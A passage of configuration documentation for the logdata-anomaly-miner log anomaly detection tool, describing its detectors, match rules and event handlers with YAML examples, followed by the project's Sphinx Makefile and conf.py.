data object (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True NewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new value combinations in multiple parser paths. * **paths** parser paths of values to be analyzed (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True NewMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new values in a parser path. * **paths** parser paths of values to be analyzed. Multiple paths mean that values from all specified paths are mixed together (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed values should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True ParserCount ~~~~~~~~~~~ This component counts occurring combinations of values and periodically sends the results as a report. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **report_interval** time interval in seconds in which the reports are sent (integer, defaults to 10). * **labels** list of strings that are added to the report for each path in paths parameter (must be the same length as paths list). (list of strings, defaults to empty list) * **split_reports_flag** boolean flag to send report for each path in paths parameter separately when set to True (boolean, defaults to False). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: ParserCount id: ParserCount paths: - "/model/type/syscall/syscall" report_interval: 10 PathValueTimeIntervalDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector analyzes the time intervals of the appearance of log_atoms. It sends a report if log_atoms appear at times outside of the intervals. The considered time intervals depend on the combination of values in the target_paths of target_path_list. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values** when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to True). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted (string of lists, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **time_period_length** length of the time window in seconds for which the appearances of log lines are identified with each other (integer, defaults to 86400). * **max_time_diff** maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff the new time is considered an anomaly (integer, defaults to 360). * **num_reduce_time_list** number of new time entries appended to the time list, before the list is being reduced (integer, defaults to 10). .. code-block:: yaml Analysis: - type: PathValueTimeIntervalDetector id: PathValueTimeIntervalDetector paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" time_period_length: 86400 max_time_diff: 3600 num_reduce_time_list: 10 PCADetector ~~~~~~~~~~~ This class creates events if event or value occurrence counts are outliers in PCA space. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate dimensions. When no paths are specified, the events given by the full path list are analyzed (list of strings). * **window_size** the length of the time window for counting in seconds (float, defaults to 600 seconds). * **min_anomaly_score** the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e., reasonable minimum scores are > 1 to detect outliers with respect to currently trained PCA matrix (float, defaults to 1.1). * **min_variance** the minimum variance covered by the principal components (float in range [0, 1], defaults to 0.98). * **num_windows** the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows (integer, defaults to 50). * **persistence_id** name of persistency document (string, defaults to Default). * **learn_mode** specifies whether new count measurements are added to the PCA count matrix (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list) * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **output_event_handlers** list of event handler id that anomalies are forwarded to (list of strings, defaults is to send to all event handlers). .. code-block:: yaml Analysis: - type: PCADetector id: PCADetector paths: - "/model/username" - "/model/service" windows_size: 60 min_anomaly_score: 1.2 min_variance: 0.95 num_windows: 100 learn_mode: true TSAArimaDetector ~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to track appearance frequencies of event lines. * **paths** at least one of the parser paths in this list needs to appear in the event to be analyzed (list of strings). * **event_type_detector** used to track the number of event lines in the time windows (string). * **waiting_time_for_tsa** time in seconds, until the time windows are being initialized (integer, defaults to 300 seconds). * **num_sections_waiting_time_for_tsa** number of sections of the initialization window (integer, defaults to 10). * **acf_pause_interval_percentage** states which area of the results of the ACF are not used to find the highest peak (float, defaults to 0.2). * **build_sum_over_values** states if the sum of a series of counts is built before applying the TSA (boolean, defaults to false). * **num_periods_tsa_ini** Number of periods used to initialize the Arima-model (integer, defaults to 20). * **num_division_time_step** Number of divisions of the time window to calculate the time step (integer, defaults to 10). * **alpha** significance level of the estimated values (float, defaults to 0.05). * **num_min_time_history** minimal number of values of the time_history after it is initialized (integer, defaults to 20). * **num_max_time_history** maximal number of values of the time_history (integer, defaults to 30). * **num_results_bt** number of results which are used in the binomial test, which is used before reinitializing the ARIMA model (integer, defaults to 15). * **alpha_bt** significance level for the bt test (float, defaults to 0.05). * **round_time_interval_threshold** Threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list (float, defaults to 0.02). * **acf_threshold** threshold, which must be exceeded by the highest peak of the cdf function of the time series, to be analyzed (float, defaults to 0.2). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **acf_auto_pause_interval** states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. * **acf_auto_pause_interval_num_min** states the number of values in which a local minima must be the minimum, to be considered a local minimum of the function and not an outlier. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **min_log_lines_per_time_step** states the minimal average number of log lines per time step to make a TSA. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD save_values: False - type: 'TSAArimaDetector' id: TSA event_type_detector: ETD waiting_time_for_tsa: 1728000 num_sections_waiting_time_for_tsa: 1000 num_division_time_step: 10 alpha: 0.05 num_results_bt: 30 alpha_bt: 0.05 num_max_time_history: 30000 round_time_interval_threshold: 0.1 acf_threshold: 0.02 PathArimaDetector ~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to analyze the values of the chosen paths. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. * **event_type_detector** used to track the number of events in the time windows. * **persistence_id** name of persistency document. * **output_logline** specifies whether the full parsed log atom should be provided in the output. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies. * **num_init** number of lines processed before the period length is calculated. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **alpha** significance level of the estimated values. * **alpha_bt** significance level for the bt test. * **num_results_bt** number of results which are used in the binomial test. * **num_min_time_history** number of lines processed before the period length is calculated. * **num_max_time_history** maximum number of values of the time_history. * **num_periods_tsa_ini** number of periods used to initialize the Arima-model. .. code-block:: yaml Analysis: - type: "EventTypeDetector" id: ETD - type: 'PathArimaDetector' id: PTSA event_type_detector: ETD paths: ["/model/model/val1", "/model/model/val2"] num_init: 20 force_period_length: True set_period_length: 15 num_periods_tsa_ini: 10 SlidingEventFrequencyDetector ~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency exceedances with a sliding window approach. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **set_upper_limit** the length of the time window for counting in seconds. * **local_maximum_threshold** sets the threshold for the detection of local maxima in the frequency analysis. A local maximum occurrs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: SlidingEventFrequencyDetector id: SEFD window_size: 3600 set_upper_limit: 10 TimeCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~ This component tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. .. code-block:: yaml Analysis: - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 .. _TimeCorrelationViolationDetector: TimeCorrelationViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 .. seealso:: :ref:`MatchRules` SimpleMonotonicTimestampAdjust ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Adjust decreasing timestamp of new records to the maximum observed so far to ensure monotony for other analysis components. TimestampsUnsortedDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector is useful to to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. .. code-block:: yaml Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector ValueRangeDetector ~~~~~~~~~~~~~~~~~~ This detector generates ranges for numeric values, detects values outside of these ranges, and automatically extends ranges when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for value range generation (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which numeric ranges should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'ValueRangeDetector' paths: - '/parser/value' id_path_list: - '/parser/id' learn_mode: True VariableCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~ First, this detector finds a list of viable variables for each event type. Second, it builds pairs of variables. Third, correlations are generated and thereafter tested and updated. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **num_init** minimal number of lines of one event type to initialize the correlation rules. * **num_update** number of lines after the initialization after which the correlations are periodically tested and updated. * **check_cor_thres** threshold for the number of allowed different values of the distribution to be considerd a correlation. * **check_cor_prob_thres** threshold for the difference of the probability of the values to be considerd a correlation. * **check_cor_num_thres** number of allowed different values for the calculation if the distribution can be considerd a correlation. * **min_values_cors_thres** minimal number of appearances of values on the left side to consider the distribution as a possible correlation. * **new_vals_alarm_thres** threshold which has to be exceeded by the number of new values divided by the number of old values to report an anomaly. * **disc_div_thres** diversity threshold for variables to be considered discrete. * **num_steps_create_new_rules** number of update steps, for which new rules are generated periodically. * **num_upd_until_validation** number of update steps, for which the rules are validated periodically. * **num_end_learning_phase** number of update steps until the update phase ends and the test phase begins. False if no End should be defined. * **num_bt** number of considered testsamples for the binomial test. * **alpha_bt** significance level for the binomialtest for the test results. * **used_homogeneity_test** states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ['Chi', 'MaxDist']. * **alpha_chisquare_test** significance level alpha for the chisquare test. * **max_dist_rule_distr** maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. * **used_presel_meth** used preselection methods. The implemented methods are ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']. * **intersect_presel_meth** states if the intersection or the union of the possible correlations found by the presel_meth is used for the resulting correlations. * **percentage_random_cors** percentage of the randomly picked correlations of all possible ones in the preselection method random. * **match_disc_vals_sim_tresh** similarity threshold for the preselection method pick_cor_match_disc_vals. * **exclude_due_distr_lower_limit** lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. * **match_disc_distr_threshold** threshold for the preselection method pick_cor_match_disc_distr. * **used_cor_meth** used correlation detection methods. The implemented methods are ['Rel', 'WRel']. * **used_validate_cor_meth** used validation methods. The implemented methods are ['coverVals', 'distinctDistr']. * **validate_cor_cover_vals_thres** threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. * **validate_cor_distinct_thres** threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions must surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableCorrelationDetector' event_type_detector: ETD num_init: 10000 num_update: 1000 num_steps_create_new_rules: 10 used_presel_meth: ['matchDiscDistr', 'excludeDueDistr'] used_validate_cor_meth: ['distinctDistr', 'coverVals'] used_cor_meth: ['WRel'] VerboseUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates verbose output for unparsed events. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'VerboseUnparsedAtomHandler' id: vuah SimpleUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates basic output for unparsed events. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'SimpleUnparsedAtomHandler' id: vuah VariableTypeDetector ~~~~~~~~~~~~~~~~~~~~ This detector analyses each variable of the event_types by assigning them the implemented variable types. * **paths** List of paths, which variables are being tested for a type. All other paths will not get a type assigned. * **learn_mode** states, if found variable types are updated when a test fails. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **save_statistics** tracks the indicators and changed variable types, if set to True. * **use_empiric_distr** states if empiric distributions of the values should be used if no continuous distribution is detected * **used_gof_test** states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. * **gof_alpha** significance level for p-value for the distribution test of the initialization. * **s_gof_alpha** significance level for p-value for the sliding gof-test in the update step. * **s_gof_bt_alpha** significance level for the binomialtest of the test results of the s_gof-test. * **d_alpha** significance level for the binomialtest of the single discrete variables. * **d_bt_alpha** significance level for the binomialtest of the test results of the discrete tests. * **div_thres** threshold for diversity of the values of a variable. The higher the more values have to be distinct to be considered to be continuous distributed. * **sim_thres** threshold for similarity of the values of a variable. The higher the more values have to be common to be considered discrete. * **indicator_thres** threshold for the variable indicators to be used in the event indicator. * **num_init** number of lines processed before detecting the variable types. * **num_update** number of values for which the variableType is updated. * **num_update_unq** number of values for which the values of type unq is unique (last num_update + num_update_unq values are unique). * **num_s_gof_values** number of values which are tested in the s_gof-test. * **num_s_gof_bt** number of tested s_gof-tests for the binomialtest of the test results of the s_gof-tests. * **num_d_bt** number of tested discrete samples for the binomialtest of the test results of the discrete tests. * **num_pause_discrete** number of paused updates, before the discrete var type is adapted. * **num_pause_others** number of paused updates, before trying to find a new variable type for the variable type others. * **test_gof_int** states if integer number should be tested for the continuous variable type. * **num_stop_update** switch the LearnMode to False after num_stop_update processed lines. If False LearnMode will not be switched to False. * **silence_output_without_confidence** silences all messages without a confidence-entry. * **silence_output_except_indicator** silences all messages which are not related with the calculated indicator. * **num_var_type_hist_ref** states how long the reference for the var_type_history_list is. The reference is used in the evaluation. * **num_update_var_type_hist_ref** number of update steps before the var_type_history_list is being updated. * **num_var_type_considered_ind** this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. * **num_stat_stop_update** number of static values of a variable, to stop tracking the variable type and read in in eventTypeD. Default is False. * **num_updates_until_var_reduction** number of update steps until the variables are tested, if they are suitable for an indicator. If not suitable, they are removed from the tracking of EvTypeD. Set to 0 to analyze all variables. Default is 20. * **var_reduction_thres** threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. * **num_skipped_ind_for_weights** number of the skipped indicators for the calculation of the indicator weights. * **num_ind_for_weights** number of indicators used in the calculation of the indicator weights. * **used_multinomial_test** states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi'. Where 'MT' means the original MT, 'Approx' is the approximation with single BTs and 'Chi' is the ChisquareTest. * **used_range_test** states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. * **range_alpha** significance niveau for the range variable type. * **range_threshold** maximal proportional deviation from the range before the variable type is rejected. * **range_limits_factor** factor for the limits of the range variable type. * **num_reinit_range** number of update steps until the range variable type is reinitialized. Set to zero if not desired. * **dw_alpha** significance niveau of the durbin watson test to test serial correlation. If the test fails the type range is assigned to the variable instead of continuous. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableTypeDetector' event_type_detector: ETD num_init: 200 num_update: 100 num_s_gof_values: 100 .. _MatchRules: ---------- MatchRules ---------- The following detectors work with MatchRules: * :ref:`AllowlistViolationDetector` * :ref:`TimeCorrelationViolationDetector` .. note:: MatchRules must be defined in the "Analysis"-part of the configuration. Every MatchRule can also define a :ref:`MatchAction` which is run when the MatchRule is applied. AndMatchRule ~~~~~~~~~~~~ This component provides a rule to match all subRules (logical and). .. code-block:: yaml Analysis: - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" OrMatchRule ~~~~~~~~~~~ This component provides a rule to match any subRules (logical or). .. code-block:: yaml Analysis: - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ParallelMatchRule ~~~~~~~~~~~~~~~~~ This component is a rule testing all the subrules in parallel. From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that matching will not stop after the first positive match. This does only make sense when all subrules have match actions associated. .. code-block:: yaml Analysis: - type: ParallelMatchRule id: parallel_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ValueDependentDelegatedMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. NegationMatchRule ~~~~~~~~~~~~~~~~~ Match elements of this component return true when the subrule did not match. .. code-block:: yaml Analysis: - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" PathExistsMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path was found in the parsed match data. .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" ValueMatchRule ~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly the given parsed value. .. code-block:: yaml Analysis: - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" ValueListMatchRule ~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly one of the values included in the value list. ValueRangeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and the value is included in [lower, upper] range. StringRegexMatchRule ~~~~~~~~~~~~~~~~~~~~ Elements of this component return true when the given path exists and the string repr of the value matches the regular expression. ModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in [lower, upper] range. ValueDependentModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 rom that date modulo the given value are included in a [lower, upper] range selected by values from the match. IPv4InRFC1918MatchRule ~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges. This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it. DebugMatchRule ~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. DebugHistoryMatchRule ~~~~~~~~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to a ObjectHistory. .. _MatchAction: ---------- MatchActions ---------- .. note:: MatchActions must be defined in the "Analysis"-part of the configuration. EventGenerationMatchAction ~~~~~~~~~~~~ This generic match action forwards information about a rule match on parsed data to a list of event handlers. .. code-block:: yaml Analysis: - type: EventGenerationMatchAction id: ip_match_action event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" AtomFilterMatchAction ~~~~~~~~~~~~ This generic match rule forwards all rule matches to a list of `AtomHandlerInterface` instances using the `SubhandlerFilter`. When `delete_components` is used, all components from the `subhandler_list` are removed from the default `SubhandlerFilter`. .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector1 paths: - "/model/second" - type: AtomFilterMatchAction id: afma subhandler_list: - NewMatchPathValueDetector1 stop_when_handled_flag: True delete_components: True ------------- EventHandling ------------- EventHandler are output modules that allow the logdata-anomaly-miner to write alerts to specific targets. All EventHandler must have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string (required) * **type**: must be an existing Analysis component (required) * **json**: A boolean value that enables that the output is formatted in json (default: False) * **pretty**: A boolean value that specifies whether json output should be in a single line (False) or pretty printed (True) (default: True) * **score**: A boolean value that enables that a confidence is added to the output of certain detectors (default: False) * **weights**: A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted (default: None) * **auto_weights**: A boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances) (default: False) * **auto_weights_history_length**: A integer value that specifies the number of values that are considered in the calculation of the weights (default: 1000) StreamPrinterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~~ The StreamPrinterEventHandler writes alerts to a stream. If no output_file_path is defined, it writes the output to **stdout** * **output_file_path**: This string value defines a file where the output should be written to. Default: stdout .. code-block:: yaml EventHandlers: # output to stdout: - id: 'stpe' type: 'StreamPrinterEventHandler' # output json to file: - id: 'stpefile' type: 'StreamPrinterEventHandler' json: true pretty: true output_file_path: '/tmp/aminer_out.log' SyslogWriterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~ The SyslogWriterEventHandler writes alerts to the local syslog instance. .. warning:: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks.0 * **instance_name**: This string defines the instance_name for the syslog. Default: **aminer** .. code-block:: yaml EventHandlers: - id: 'swe' type: 'SyslogWriterEventHandler' instance_name: 'logdata-anomaly-miner' KafkaEventHandler ~~~~~~~~~~~~~~~~~ The KafkaEventHandler writes it's output to a `Kafka Message-Queue `_ * **topic**: String property with the topic-name for the message queue * **cfgfile**: String property with the path to the kafka-config file. A comprehensive list of all config-parameters can be found at https://kafka-python.readthedocs.io/en/master/apidoc/KafkaProducer.html A typical kafka-config-file might look like this: .. code-block:: yaml [DEFAULT] bootstrap_servers = localhost:9092 security_protocol = PLAINTEXT .. note:: The header [DEFAULT] is important and must exist in the configuration file .. code-block:: yaml EventHandlers: # output to kafka using the topic 'aminer' - id: 'mqe' json: True topic: 'aminer' cfgfile: '/etc/aminer/kafka-client.conf' type: 'KafkaEventHandler' ZmqEventHandler ~~~~~~~~~~~~~~~ The ZmqEventHandler writes its output to a `Zero Message-Queue `_ * **topic**: String property with the topic-name for the message queue. If topic is not defined, then this handler will send messages without any topic. * **url**: String property with the url for the zmq-listener. If no url is defined, this handler will use 'ipc:///tmp/aminer'. A comprehensive list of all possible "endpoints" can be found at http://api.zeromq.org/master:zmq-bind .. code-block:: yaml EventHandlers: # output to zeromq using the topic 'aminer' - id: "zmqe" type: 'ZmqEventHandler' topic: 'aminer' url: 'tcp://*:5555' # tcp-port 5555 on all interfaces logdata-anomaly-miner-2.6.1/docs/Makefile000066400000000000000000000011721437606560100203020ustar00rootroot00000000000000# Minimal makefile for Sphinx documentation # # You can set these variables from the command line, and also # from the environment for the first two. SPHINXOPTS ?= SPHINXBUILD ?= sphinx-build SOURCEDIR = . BUILDDIR = _build # Put it first so that "make" without argument is like "make help". help: @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) .PHONY: help Makefile # Catch-all target: route all unknown targets to Sphinx using the new # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). %: Makefile @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) logdata-anomaly-miner-2.6.1/docs/conf.py000066400000000000000000000041501437606560100201400ustar00rootroot00000000000000# Configuration file for the Sphinx documentation builder. # # This file only contains a selection of the most common options. For a full # list see the documentation: # https://www.sphinx-doc.org/en/master/usage/configuration.html # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'logdata-anomaly-miner' copyright = '2023, Florian Skopik, Markus Wurzenberger, Max Landauer, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf, Georg Hoeld' author = 'Florian Skopik, Markus Wurzenberger, Max Landauer, Georg Hoeld, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf' release = '2.6.1' # -- General configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['recommonmark', 'sphinx.ext.autodoc', 'sphinx.ext.napoleon'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] 